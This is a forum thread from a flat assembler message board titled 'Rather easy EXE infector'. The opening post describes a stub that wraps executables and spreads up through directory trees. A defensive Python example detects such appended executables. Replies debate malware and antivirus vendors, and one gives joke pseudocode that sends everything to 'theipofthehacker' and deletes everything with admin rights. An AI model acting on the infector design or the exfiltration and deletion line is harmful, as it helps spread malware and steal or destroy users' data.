flat assembler
Message board for the users of flat assembler.
Tutorials and Examples > Rather easy EXE infector
typedef 25 Dec 2013, 06:53
A very simple way of infecting EXEs. Not practical but quite useful. All it does is append the original code to a stub, which will execute itself first and then the original code. IMO I prefer entry point hijacking and reconstructing the whole PE file. However, that method would not work on encrypted EXEs. This is where this method comes in.
There are different ways of executing the original code. In this example, I just duplicate the infected file, remove the stub and let the Windows loader take care of the rest. The duplicated file is hidden in the same folder but can also be extracted to a different folder. The stub then waits for the duplicated file and deletes it after its process terminates. A more effective way is to find EXEs in the current directory, infect them, then move up to the parent folder and so on up to a specified depth. No error checking, just straight-up execution and no optimizations. It does not check if a file is already infected; it will infect the file again every time infector.exe is run.
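The wrapper described in the opening post leaves the original executable appended after the last section of the stub, in what PE tooling calls the overlay, and the post admits that nothing checks whether a file has already been wrapped. The check a defender (or the author) would want is to parse the section table, compute where the last section's raw data ends, and compare that with the file size. The following Python is an added example, not the code attached to the post: it builds a constructed, non-runnable minimal PE32 image purely as test input, then reports whether trailing data exists and whether that trailing data is itself a complete PE (the signature of this kind of wrapper). Names such as `build_minimal_pe` and `overlay_info` are the example's own.

```python
import struct

FILE_ALIGN = 0x200
COFF_FMT = "<HHIIIHH"            # machine, nsections, timestamp, symtab, nsyms, opt_size, flags
SECTION_HDR_FMT = "<8sIIIIIIHHI"  # name, vsize, vaddr, rawsize, rawptr, relocs, lines, nrelocs, nlines, flags


def build_minimal_pe(section_data: bytes, overlay: bytes = b"") -> bytes:
    """Constructed test input only: MZ stub, PE signature, COFF header, a zero-filled
    PE32 optional header and one .text section, optionally followed by extra bytes.
    It is not a loadable program; it exists so the parser below has something to read."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                                            # PE32 optional header size
    coff = struct.pack(COFF_FMT, 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)  # PE32 magic, rest zeroed
    raw_ptr = FILE_ALIGN                                      # headers padded to one alignment unit
    raw_size = -(-len(section_data) // FILE_ALIGN) * FILE_ALIGN
    sect = struct.pack(SECTION_HDR_FMT, b".text", len(section_data), 0x1000,
                       raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\x00\x00" + coff + opt + sect).ljust(raw_ptr, b"\x00")
    return headers + section_data.ljust(raw_size, b"\x00") + overlay


def _looks_like_pe(data: bytes) -> bool:
    """True when data starts with an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def overlay_info(pe: bytes) -> dict:
    """Find where the last section's raw data ends and describe whatever follows it."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, pe, coff_off)
    sect_off = coff_off + struct.calcsize(COFF_FMT) + opt_size
    # The image can never end before its own section table.
    sections_end = sect_off + nsections * struct.calcsize(SECTION_HDR_FMT)
    for i in range(nsections):
        _, _, _, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_HDR_FMT, pe, sect_off + i * 40)
        sections_end = max(sections_end, raw_ptr + raw_size)
    overlay = pe[sections_end:]
    return {
        "sections_end": sections_end,
        "overlay_size": len(overlay),
        "has_overlay": bool(overlay),
        # A whole second executable appended after the sections is the wrapper pattern.
        "overlay_is_pe": _looks_like_pe(overlay),
    }


if __name__ == "__main__":
    clean = build_minimal_pe(b"\xC3")                   # one RET, nothing appended
    wrapped = build_minimal_pe(b"\xC3", overlay=clean)  # a second image appended after the sections
    for label, image in (("clean", clean), ("wrapped", wrapped)):
        print(label, overlay_info(image))
```

`has_overlay` alone is not a verdict: installers and self-extracting archives carry payloads in the overlay, and an Authenticode signature's certificate table also lives past the last section, so the check is a triage signal that should be combined with `overlay_is_pe` and with the security directory before anything is flagged. The same parse is what an infector would need to avoid wrapping a file twice, which is why the post's "does not check if file is already infected" is easy to fix.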
revolution 25 Dec 2013, 07:02
typedef wrote: Not practical but quite useful.
revolution 25 Dec 2013, 07:06
typedef wrote:
typedef 25 Dec 2013, 07:10
revolution wrote:
rev, without malware do you think AV companies will make a dime?
revolution 25 Dec 2013, 07:11
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.
So I guess you have no example that doesn't involve malware?
typedef 25 Dec 2013, 07:15
revolution wrote: Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.
Without broken computers there wouldn't be malware, and then there wouldn't be AV companies. And without Govt. backdoors and poor coding skills and hunger for money, there wouldn't be broken computers.
revolution 25 Dec 2013, 07:20
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.
typedef 25 Dec 2013, 07:29
revolution wrote: Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.
But the people who rebuild the houses love to do so because they are hungry for money, and sometimes they'll burn down some houses themselves just to be the ones who get hired to rebuild them. Wonder why AVs cook up stories about malware that no one has even heard of and force you to buy/upgrade their software. Hell, they even make their software deliberately "incompatible" with other security software so their malware doesn't get flagged by their competitors.
revolution 25 Dec 2013, 07:31
Indeed. I am no fan of AV companies either. It is not a perfect world we live in.
HaHaAnonymous 25 Dec 2013, 13:38
[ Post removed by author. ]
baldr 25 Dec 2013, 14:07
HaHaAnonymous,
They have to sell a product (as insecure as it is); it has nothing to do with your expectations (about its stability/satisfaction/whatever). It works (up to some measure), so it can be sold. Nothing personal, just business. AV authors can (and probably would) intimidate regular users into using (and buying) their products, just as houseware manufacturers insist that their products will make our living safer. They both lie, in a way. It's about how far you would go to check it.
m3ntal 25 Dec 2013, 18:29
typedef: I'm sure you have some positive examples. How about a binary tree? Or a minimal Android example?
If an agency contacted me to create malware software, I'd refuse their business and tell them that it goes against my philosophy that software should be productive and not destructive to the user. Knowledge of LL concepts, machine code, executable formats, etc., can be used in a positive way; example: a dynamic binary translator to/from X86+ARM. Just my thoughts.
Frank 29 Dec 2013, 14:38
Alright, after eleven off-topic responses, maybe someone should comment on the actual tutorial.
typedef, you have provided a generic EXE wrapper template. The code is written cleanly, it is easy to understand, and when I tried it briefly, it worked as expected (WIN7 Home Edition; no serious virus scanner installed). In that respect it is a very nice addition to the "Examples and Tutorials" section of this board. Congratulations! What needs a bit more work in the future is how you describe your contributions. By needlessly (and incorrectly!) framing your "EXE wrapper" as an "EXE infector" you achieved several things that you probably don't want: (a) you made yourself look like an attention-whoring 14-year-old, (b) you invited the useless weirdo discussion about malware that you now got, rather than receiving useful feedback from competent people, and (c) people interested in EXE wrapping for legit purposes will ignore your tutorial because its context shouts "filth, smut, danger" loudly enough to make them not even look at the code. No congratulations on that. This feedback is genuinely meant to be useful to you. You're welcome.
HaHaAnonymous 29 Dec 2013, 17:01
[ Post removed by author. ]
edfed 31 Dec 2013, 12:04
malware is just like regular software with curious policies...
a machine is dumb (mov eax,ebx / lea eax,[eax*5] etc...); it does what you tell it to do. malware involves the same instructions as regular software, but they are arranged in order to break the system... so it is not the laziness of the system developer or whatever, but just the will of malware writers to make malware. you can virtually write malware for any programmable machine, from a heater regulator to a Cray, but it is still just malware. the goal of software is not to reproduce the genetically altered things we see in hospitals, but to make cooler and cooler stuff. maybe malware can bring some bricks to the future of computing, by highlighting some basic mechanisms of attacks and studying some ways to avoid them... but there will always be malware writers, even for the most secure platform. then, what is the goal of security? take 30%, 60%, 99% of the machine just to protect it??? ridiculous. the size of AV software is just a big insult to the freedom and efficiency needs of this time. i don't believe malware is cool at all. first, it is a pure waste of time to create malware; the creativity of the malware writer is poorly exploited. second, it is a pure waste of resources: the machines running malware will use energy and hardware to do that, and what it does is clearly useless. anybody can tell you that bill gates became what he is now by writing goodware (not malware). what he did was make useful OSes and suites, used by billions of people, and it is not because it is microsoft, nor because he was the son of somebody, but just because he focused on the creativity and usefulness of his products. of course, m$ is $hit, but a cool $hit, and i don't believe that anybody here has never used a m$ product at least once in his life... in fact, malware is just the product of jealous people who consider windows the shit of the century...
in my opinion, the real shit is more a military product like the kalashnikov, or a chemical like DDT, or something really dangerous... and that's the reason why bill gates became what he is now. he didn't create malware and weapons, but just software used by the weapons designers. hem... bill gates is not a model to follow, but he is not the problem to fight. and writing malware is always possible; even a fortress can be attacked. then, what do we need? computers or fortresses? i need a computer to do cool things, not a fortress to hide behind in fear. and windows 98 is really cool because now it can no longer browse the internet, since the new script standards are not supported; so win98 is just a pure machine, able to do stuff like they did before the internet became widespread. for example, win98 supports sockets very well, and that is very cool for trying out network designs and fuck malware. for example, this kind of pseudocode:
Code:
invoke sendEverythingInbackGround,"theipofthehacker"
invoke deleteEverythingInBackgroundWithAdminPrivilege
DOS386 01 Jan 2014, 09:03
revolution wrote: Creating malware is like burning down houses
NO. Creating malware is like creating matches. But nowadays nobody needs malware (we got it already from M$), like nobody needs matches (we no longer heat using fire). So creating malware is useless but legal. Using malware to destroy other people's PCs is a crime. And creating matches is useless but legal. Using matches to burn down other people's houses is a crime. Further, nobody would have malware problems or need "AV" (= malware) if hardware and OSes were designed properly.
HaHaAnonymous 01 Jan 2014, 14:12
[ Post removed by author. ]
tthsqe 02 Jan 2014, 19:26
HaHaAnonymous, if what you are saying is true, are not AV companies themselves viruses on the computer market? I always thought of AV programs as viruses ever since I reached the age of reason...
HaHaAnonymous 02 Jan 2014, 23:44
[ Post removed by author. ]
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.